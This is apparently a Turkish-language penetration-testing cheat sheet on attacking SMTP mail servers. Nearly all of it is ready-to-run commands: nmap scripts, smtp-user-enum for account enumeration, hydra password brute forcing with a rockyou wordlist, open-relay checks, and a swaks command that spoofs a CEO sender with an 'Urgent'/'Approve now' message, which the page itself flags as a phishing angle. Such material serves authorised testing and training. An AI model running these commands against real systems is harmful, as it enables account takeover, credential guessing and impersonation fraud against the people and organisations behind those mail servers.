Skip to content

SMTP Commands

network smtp

SMTP (25/465/587) banner, kullanıcı enum, open relay ve kimlik brute için zengin bir yüzeydir. Komut diyalogunu elle konuşmak NSE kadar değerlidir.

  1. Banner ve desteklenen komutları (EHLO) al.

  2. VRFY/EXPN/RCPT ile kullanıcı enum dene.

  3. AUTH mekanizmalarını ve brute’u çalıştır.

  4. Open relay ve smuggling hipotezlerini doğrula.

Terminal window
nmap -Pn -sV -p25,465,587 --script smtp-commands,smtp-enum-users,smtp-open-relay TARGET
Terminal window
nc -nv TARGET 25
Terminal window
openssl s_client -connect TARGET:465 -crlf
Terminal window
openssl s_client -starttls smtp -connect TARGET:587 -crlf
EHLO pentest.local
VRFY root
EXPN staff
MAIL FROM:<attacker@evil.com>
RCPT TO:<victim@corp.local>
DATA
Subject: test
body
.
QUIT
Terminal window
smtp-user-enum -M VRFY -U users.txt -t TARGET
Terminal window
smtp-user-enum -M EXPN -U users.txt -t TARGET
Terminal window
smtp-user-enum -M RCPT -U users.txt -t TARGET -f attacker@evil.com
Terminal window
nmap -p25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} TARGET
EHLO a
AUTH LOGIN
Terminal window
hydra -L users.txt -P rockyou.txt smtp://TARGET
Terminal window
hydra -L users.txt -P rockyou.txt smtp://TARGET -s 587 -S
Terminal window
swaks --to victim@corp.local --from attacker@corp.local --server TARGET --auth LOGIN --auth-user user --auth-password pass --body 'x'
Terminal window
nmap -p25 --script smtp-open-relay TARGET
Terminal window
swaks --to external@gmail.com --from spoof@corp.local --server TARGET --body 'relay-test'
MAIL FROM/RCPT TO dış domain kabul ediyorsa relay
Terminal window
swaks --to victim@corp.local --from ceo@corp.local --server TARGET --header 'Subject: Urgent' --body 'Approve now'
From / Reply-To / Return-Path tutarsızlıkları phishing için
[ ] EHLO/capabilities alındı
[ ] VRFY/EXPN/RCPT enum denendi
[ ] AUTH brute / geçerli hesap
[ ] Open relay doğrulandı veya elendi
[ ] Spoof / smuggling için sonraki adım not edildi